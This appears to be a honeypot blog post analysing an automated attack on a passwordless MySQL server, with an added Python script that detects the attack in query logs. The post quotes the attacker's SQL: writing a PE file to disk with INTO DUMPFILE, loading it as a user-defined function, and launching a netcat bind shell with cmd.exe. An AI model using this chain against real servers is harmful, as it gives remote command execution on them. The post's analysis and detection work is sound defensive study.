Cool but stupid attack
I found an interesting attack on one of the honeypots the other day. A miscreant used a MySQL server with no password and dropped two files on the operating system.
First, the attacker opened a connection to tcp-3306 and logged in as root. Then it created a table “FILEDATA”:
CREATE TABLE FILEDATA(FILEDATA Blob NOT NULL) TYPE=MyISAM;
Then an INSERT into this table:
INSERT INTO FILEDATA (FILEDATA) VALUES(0x4D5A9000[...]
(0x4D5A is “MZ”, the DOS header magic at the start of a PE file)
Then it dumps the file to disk:
SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'C:\\winnt\\system32\\shell64.dll'
SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'D:\\winnt\\system32\\shell64.dll'
SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'E:\\winnt\\system32\\shell64.dll'
Then it drops the FILEDATA table, creates it again, does a new INSERT with another PE file, and stores that file on the system as:
SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'C:\\nc.exe';
Then it registers a new function in MySQL, loading the dropped DLL as a user-defined function (UDF):
CREATE FUNCTION my_name returns STRING soname 'shell64';
And calls it:
select my_name('start cmd.exe /c c:\\nc.exe -l -p 21000 -t -d -e cmd.exe');
md5sum: 50e774a0e95adfac0965fbb28369526f  shell64.dll
A quick look at this file reveals that it is packed with UPX 1.92 (a runtime packer), but the content is not very interesting. It has a reference to test2.dll and exports a function called “my_name”. It looks like a test to see whether the attack was successful or not: my_name locates command.com or cmd.exe.
In other words, the miscreant tries to open a cmd.exe shell on tcp-21000. The whole attack is done in 3 seconds, so I guess it is an automated attack. Too bad my system was a Unix system and not a Windows system :)
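As an added example (not from the original post), here is a small detection script that runs over constructed MySQL general-query-log lines and flags each step of the chain above: a hex literal starting with MZ, a SELECT ... INTO DUMPFILE write, CREATE FUNCTION ... SONAME, and a shell name inside a statement. The log line format, the connection ids and the sample statements are assumptions made for the example.

```python
import re

# Constructed sample lines in the style of the MySQL general query log
# (connection id, command type, statement). Not taken from the post.
SAMPLE_LOG = r"""
2 Query     CREATE TABLE FILEDATA(FILEDATA Blob NOT NULL) TYPE=MyISAM
2 Query     INSERT INTO FILEDATA (FILEDATA) VALUES(0x4D5A900003000000)
2 Query     SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'C:\\winnt\\system32\\shell64.dll'
2 Query     CREATE FUNCTION my_name returns STRING soname 'shell64'
2 Query     select my_name('start cmd.exe /c c:\\nc.exe -l -p 21000 -t -d -e cmd.exe')
3 Query     SELECT name, price FROM products WHERE id = 42
"""

LOG_LINE = re.compile(r"^\s*(\d+)\s+Query\s+(.*)$")

# One rule per step of the dropper chain seen on the honeypot.
RULES = {
    "file_write": re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\b", re.I),    # server-side file write
    "udf_load":   re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I),  # shared library as UDF
    "pe_blob":    re.compile(r"\b0x4d5a", re.I),                           # hex literal starting 'MZ'
    "shell_cmd":  re.compile(r"\b(?:cmd\.exe|command\.com)\b", re.I),      # shell named in a statement
}

def scan_query_log(text):
    """Return (hits, per_conn): hits is a list of (line_no, conn_id, [rule names]) for
    every statement matching at least one rule; per_conn maps conn_id -> set of rules."""
    hits, per_conn = [], {}
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        conn_id, sql = int(m.group(1)), m.group(2)
        matched = [name for name, rx in RULES.items() if rx.search(sql)]
        if matched:
            hits.append((line_no, conn_id, matched))
            per_conn.setdefault(conn_id, set()).update(matched)
    return hits, per_conn

def udf_dropper_connections(per_conn):
    """Connections that both wrote a file to disk and registered a UDF from a shared
    library: together these two steps turn a database login into code execution."""
    return sorted(c for c, rules in per_conn.items() if {"file_write", "udf_load"} <= rules)

if __name__ == "__main__":
    hits, per_conn = scan_query_log(SAMPLE_LOG)
    for line_no, conn_id, rules in hits:
        print(f"line {line_no} conn {conn_id}: {', '.join(rules)}")
    print("UDF dropper chain on connections:", udf_dropper_connections(per_conn))
```

Single rules fire on legitimate administration too (a DBA loading a UDF, a report written with INTO OUTFILE); the combination of a file write and a UDF load on one connection, within seconds, is what marks this chain.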
Thanks to the team for analyzing this attack.
